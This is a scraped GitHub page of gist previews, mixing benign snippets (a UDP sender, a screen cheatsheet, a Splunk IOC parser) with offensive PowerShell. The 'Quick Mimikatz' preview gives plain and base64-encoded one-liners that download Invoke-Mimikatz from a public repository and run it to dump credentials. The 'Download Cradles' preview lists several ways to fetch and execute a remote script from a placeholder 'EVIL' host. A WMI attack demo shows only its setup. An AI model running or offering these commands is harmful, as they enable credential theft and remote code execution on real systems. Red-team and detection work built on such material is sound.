Skip to content

Instantly share code, notes, and snippets.

View MHaggis's full-sized avatar
:shipit:

Michael Haag MHaggis

:shipit:
471 followers · 92 following
View GitHub Profile
@mattifestation
mattifestation / WMI_recon_and_attacks.ps1
Last active April 26, 2023 04:47
BlueHat 2016 - WMI recon and attack demo
#############
### SETUP ###
#############
# Set up remote session
$Credential = Get-Credential TestUser
$AdminCred = Get-Credential Administrator
$SessionOption = New-CimSessionOption -Protocol Dcom
$CimSession = New-CimSession -Credential $Credential -ComputerName TestPC -SessionOption $SessionOption
$AdminCimSession = New-CimSession -Credential $AdminCred -ComputerName TestPC -SessionOption $SessionOption
@PeteGoo
PeteGoo / Send-UdpDatagram.ps1
Last active November 6, 2024 15:22
Sending UDP datagrams in powershell
function Send-UdpDatagram
{
Param ([string] $EndPoint,
[int] $Port,
[string] $Message)
$IP = [System.Net.Dns]::GetHostAddresses($EndPoint)
$Address = [System.Net.IPAddress]::Parse($IP)
$EndPoints = New-Object System.Net.IPEndPoint($Address, $Port)
$Socket = New-Object System.Net.Sockets.UDPClient
@gfoss
gfoss / Quick-Mimikatz
Last active November 20, 2024 14:51
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active April 29, 2025 17:08
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@jctosta
jctosta / screen_cheatsheet.markdown
Last active April 28, 2025 11:10
Screen Cheatsheet

Screen Quick Reference

Basic

Description Command
Start a new session with session name screen -S <session_name>
List running sessions / screens screen -ls
Attach to a running session screen -x
Attach to a running session with name screen -r
@irctrakz
irctrakz / IOC Splunker
Created February 8, 2013 23:18
Script to parse openIOC format files and search Splunk for extracted IP addresses.
#! /usr/bin/perl
#
# Script written to pull IP data from openIOC and search Splunk.
#
use strict;
use warnings;
$|=1;